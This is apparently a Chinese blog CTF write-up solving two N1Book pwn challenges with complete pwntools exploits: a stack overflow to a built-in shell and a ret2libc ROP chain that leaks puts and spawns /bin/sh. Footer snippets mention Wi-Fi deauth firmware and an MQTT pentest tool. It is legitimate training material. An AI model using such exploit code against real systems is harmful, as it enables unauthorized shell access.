N1Book-Pwn系列I

已于 2023-03-27 19:53:01 修改
阅读量137 收藏
点赞数
文章标签: 安全
于 2023-03-27 19:43:33 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Civit_/article/details/129802215
版权

[第六章 CTF之PWN章]stack

拿到手checksec一下,看看保护
在这里插入图片描述
64位,开启了NX保护,打开IDA看看
在这里插入图片描述
在这里插入图片描述
可以看到gets函数,明显的栈溢出漏洞,并且还有system(“/bin/sh”),直接编写exp

exp:

from pwn import *

io=remote('node4.buuoj.cn',28487)

shell=0x40053B

payload = b'a'*(0xa+8)#偏移为0xa,再加上覆盖rbp(64位需要加8)
payload += p64(shell)

io.sendline(payload)
io.interactive()

在这里插入图片描述

[第六章 CTF之PWN章]ROP

还是切克一下看保护
在这里插入图片描述
64位,打开IDA看看
在这里插入图片描述
可见还是简单的栈溢出,与上题不同的是没有system函数和字符串“/bin/sh”了,所以需要构造链去泄露函数地址

利用工具寻找存放参数寄存器地址从而构造ROP链
在这里插入图片描述
exp:

from pwn import *
from LibcSearcher import *

io=remote('node4.buuoj.cn',25137)
#io=process('./rop')
elf = ELF('./rop')
libc=elf.libc
#libc=ELF('./libc-2.271.so')

puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
main=elf.sym['main']

pop_rdi=0x4005d3

payload=b'a'*(0xa+8)+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main)
io.recvuntil("hello")
io.sendline(payload)

puts_addr=u64(io.recv(6).ljust(8,b'\x00'))

libc_base=puts_addr-libc.symbols['puts']
sys_addr=libc_base + libc.symbols['system']
bin_sh = next(libc.search(b"/bin/sh"),) + libc_base 

payload=b'a'*(0xa+8)+p64(pop_rdi)+p64(bin_sh)+p64(sys_addr)
io.recvuntil("hello")
io.sendline(payload)

io.interactive()

在这里插入图片描述

Lxxxt_
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
n1ctf(部分复现)
pwnyuan's blog
11-05 1145
N1CTF 2020 部分复现BeforeCryptoVSS源码思路脚本其他视觉密码方案Mersenne Twisterrandcrack库-RandCrackEasy_RSA源码思路脚本其他基于密码学中格的基础知识FlagBot源码思路After Before 这半个月一连串的比赛,淦,爷要脑溢血了(两眼一黑,直接去世) 导致我现在才复现N1CTF 菜狗表示签到和签退好评,淦 复现的时候学到好多,有些东西要找个时间梳理一下了,这里仅仅放一下我的一些理解和想法好了 继续肝ctf! 淦啊!这已经不是wp了,是
[N1BOOK PARTofPWN] ROP本地
Tokameine的博客
07-17 343
这道题在BUU远程服务器上没能通过,只是在本地测试成功了,该问题将留到最后去,还请知道的大佬指教。 ------------------------------------------------ 首先先查询一下保护,只有NX a@ubuntu:~/Desktop/test$ checksec rop [*] '/home/giantbranch/Desktop/test/rop' Arch: amd64-64-little RELRO: ...
buuctf-N1Book[第六章 CTF之PWN章]
CHAWUCIREN1的博客
10-17 2302
64位,开启了NX保护 shift + F12查看里面的字符串 发现自带system和bin/sh的地址 bin_sh = 0x400537 gets函数对输入的长度没有限制 查看一下v1的栈空间 需要填充0xA + 0x8的空间 payload = “A” *(0xA + 8) 由于存在栈对齐,所以还要加一个地址 ret = 0x40054E 构造的exp如下 from pwn import * #p = process("./stack") p = remote("node4.buuoj..
[第六章 CTF之PWN章]n1ker
yongbaoii的博客
04-18 602
我要学pwn.day1
weixin_45963786的博客
07-03 507
rip _buu 潜心修炼,从基础开始 这是一道基础栈溢出的题 解题流程流程 检查文件 $ file ./rip ./rip: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=1c72ddcad651c7f35bb655e0ddda5ecbf8d3199
N1BOOK BabyAlgorithm
qq_45935709的博客
11-16 923
N1BOOK [第五章 CTF之RE章] BabyAlgorithm 比较菜写的代码可能不太行 题目下载 64位程序拖入IDA 判断输入长度是否为45,是的话进行加密,然后比较。 进入sub_400874 两个函数是加密的步骤。 可以找到已经加密好的数据进行爆破,gdb动态调试获得加密数据 断点下在0x400A62这里为开始比较,生成45个字符输入防止直接退出。 IDA中查看地址为 rsp+A0 得到加密后的数据,注意这里是小端模式 所以加密后的密文需要反过来 0xc6,0x21,0xca,0xb
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
ctf题库ctf-pwn赛题收集
03-31
CTF(夺旗赛)题库是一个由安全专家和爱好者们制作的一系列网络安全挑战。这些挑战旨在测试各种安全技能,包括密码学、逆向工程、漏洞利用和网络分析等。 CTF题库通常由多个类别的挑战组成,例如Web安全、二进制反...
buuoj [第六章 CTF之PWN章]fsb
yongbaoii的博客
01-30 1794
非栈上的格式化字符串漏洞 + 劫持GOT表 瞅瞅检查 开了NX、canary跟PIE。 RELRO没有开,可以考虑劫持GOT表。 进去是个循环 里面是个格式化字符串漏洞。 因为它开的空间是堆上的,所以常规栈上的格式化字符串漏洞不能用。 非栈上的格式化字符串漏洞 非栈上的格式化字符串漏洞的话,先在printf处下断点。 总体思路 满足利用要求的三个指针分别在printf第10、16、20个参数的位置。该程序在循环执行20次输入、输出前申请了一个内存块,用于存放输入的字符串,循环结束后会释放掉这个内存
[BUUCTF-pwn]——[第六章 CTF之PWN章]stack
Y_peak的博客
03-12 726
[BUUCTF-pwn]——[第六章 CTF之PWN章]stack 题目地址: https://buuoj.cn/challenges#[%E7%AC%AC%E5%85%AD%E7%AB%A0%20CTF%E4%B9%8BPWN%E7%AB%A0]stack 思路 一个简单的栈溢出, 注意栈平衡就好 exploit from pwn import * p = remote('node3.buuoj.cn',25385) shell = 0x0000000000400537 ret = 0x0000000
【盖世汽车-注册安全分析报告】
09-02 792
盖世汽车(上海盖世网络技术有限公司)是汽车产业专业的信息服务平台,为企业及行业人士提供一站式服务。
[图解]SysML和EA建模住宅安全系统-活动作为块
rolt的专栏
08-30 1197
然后看它们之间的各种各样的依赖关系
【一嗨租车-注册安全分析报告-滑动验证加载不正常导致安全隐患】
最新发布
09-02 781
一嗨租车创立于2006年1月,主要为个人和政企用户提供综合汽车出行服务,一嗨租车于北京时间2014年11月18日晚9点45分,正式登陆美国纽交所挂牌交易, 作为美股上市公司,拥有雄厚的技术实力,但采用的是通俗的滑动验证产品,并且不能正常加载导致安全隐患。即使问题解决,其安全性在机器学习的今天, 已经无法应对攻击了,并且正是由于该产品通俗, 所以在网上破解的文章和教学视频也是大量存在,并且经过验证滑动产品很容易被破解, 所以除了滑动验证方式, 花样百出的产品层出不穷,但本质就是牺牲用户体验来提高安全
Web3开发与安全:6个月高效学习路径
weixin_47075747的博客
08-30 1399
这份计划应该能帮助你系统地学习智能合约开发和安全审计技能,同时克服英语的障碍。
网络安全售前入门08安全服务——Web漏洞扫描服务
打工人
08-31 590
Web漏洞扫描服务主要针对应用系统漏洞进行扫描,主要包括扫描WEB服务器(IIS、Websphere、Weblogic、Apache等)的漏洞;识别数据库类型;扫描第三方组件的漏洞;检测常见的WEB应用弱点,支持OWASP TOP 10等主流安全漏洞。
钓鱼特辑(四)安全较量,摆脱“麻瓜”标签
Eaglecloud的博客
08-30 617
近期,某知名制造业企业HR又收到了来自红队“求职者”的简历,显示名为「陈梓锋-华南理工大学-硕士」的压缩文件,立马被亿格云枢EDR检测到并触发告警,企业安全团队在亿格云安全团队的介入下,及时剖析并处置了本次钓鱼攻击,经分析,本次钓鱼攻击使用了多款远控C2,规避调试器、规避内存扫描等,对抗技术丰富。另一种是在本身的shellcode内就实现了加解密。,有效应对大部分旨在规避传统安全检测的攻击,构建了一个多维度的检测与响应机制,从而为企业筑起了一道坚固的防线,抵御钓鱼攻击等网络安全威胁,保护企业数据和资产。
mqtt-pwn安装
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-pwn所在的目录。 3. 启动mqtt-pwn容器:使用命令`sudo docker-compose up --build --detach`启动mqtt-pwn容器。 另外,您还需要安装以下软件: 1. 安装pwntools:使用命令`python3 -m pip install --upgrade pwntools`来安装并更新pwntools。 2. 安装mosquitto程序和mosquitto-clients客户端程序:使用命令`sudo apt install mosquitto`和`sudo apt install mosquitto-clients`来安装mosquitto程序和mosquitto-clients客户端程序。 请注意,以上步骤假设您已经在Linux环境下进行操作。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Lxxxt_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值